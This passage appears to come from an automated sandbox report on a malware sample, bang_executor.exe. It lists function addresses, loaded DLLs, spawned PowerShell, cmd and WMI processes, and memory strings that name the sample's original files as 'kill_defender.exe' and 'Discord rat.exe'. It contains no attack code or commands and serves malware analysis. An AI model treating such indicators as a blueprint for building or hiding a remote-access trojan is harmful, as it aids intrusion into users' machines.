          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_00507967
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004FEA07
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_0050FA90
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004E3AB7
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004E4C6E
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004F5E86
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_0050FF3E
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004E2FCB
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: 0_2_004F0FAC
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Code function: 3_2_00007FFD9BA10E65
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Code function: 3_2_00007FFD9BA113FA
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Code function: 3_2_00007FFD9BA112E0
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Code function: 3_2_00007FFD9BA112D1
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Code function: 3_2_00007FFD9BA113D3
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Code function: 19_2_00007FFD9BA113FA
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Code function: 19_2_00007FFD9BA113D3
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Code function: 19_2_00007FFD9BA112E0
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Code function: 19_2_00007FFD9BA112D1
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Code function: 28_2_00007FFD9BA00E65
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Code function: 28_2_00007FFD9BA013FB
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Code function: 28_2_00007FFD9BA013D3
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Code function: 28_2_00007FFD9BA0133C
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Code function: 32_2_00007FFD9BA013FB
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Code function: 32_2_00007FFD9BA013D3
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Code function: 32_2_00007FFD9BA0133C
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: String function: 00501D60 appears 31 times
          Source: C:\Users\user\Desktop\bang_executor.exe Code function: String function: 00501590 appears 57 times
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1236 -s 2324
          Source: bang_executor.exe.0.dr Static PE information: No import functions for PE file found
          Source: bang_executor.exe, 00000000.00000003.1607170188.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamekill_defender.exe$ vs bang_executor.exe
          Source: bang_executor.exe, 00000000.00000003.1607170188.0000000004EF1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDiscord rat.exe8 vs bang_executor.exe
          Source: bang_executor.exe, 00000003.00000000.1613544617.0000023077238000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenameDiscord rat.exe8 vs bang_executor.exe
          Source: bang_executor.exe, 00000013.00000002.1765725139.0000023B862C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs bang_executor.exe
          Source: bang_executor.exe.0.dr Binary or memory string: OriginalFilenameDiscord rat.exe8 vs bang_executor.exe
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: version.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: dxgidebug.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: sfc_os.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: dwmapi.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: riched20.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: usp10.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: msls31.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: windowscodecs.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: textshaping.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: textinputframework.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: coreuicomponents.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: coremessaging.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: propsys.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: edputil.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: appresolver.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: bcp47langs.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: slc.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: sppc.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: pcacli.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: mpr.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: windows.fileexplorer.common.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: ntshrui.dll
          Source: C:\Users\user\Desktop\bang_executor.exe Section loaded: cscapi.dll
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: mscoree.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: apphelp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: websocket.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rasapi32.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rasman.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rtutils.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: dhcpcsvc.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: secur32.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: mscoree.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: apphelp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: propsys.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: edputil.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: wintypes.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: appresolver.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: bcp47langs.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: slc.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: userenv.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: sppc.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
          Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: mscoree.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: websocket.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rasapi32.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rasman.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rtutils.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: dhcpcsvc.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: secur32.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: mscoree.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: websocket.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rasapi32.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rasman.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rtutils.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: dhcpcsvc.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: secur32.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: mscoree.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: websocket.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rasapi32.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rasman.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rtutils.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: dhcpcsvc.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: secur32.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe Section loaded: schannel.dll
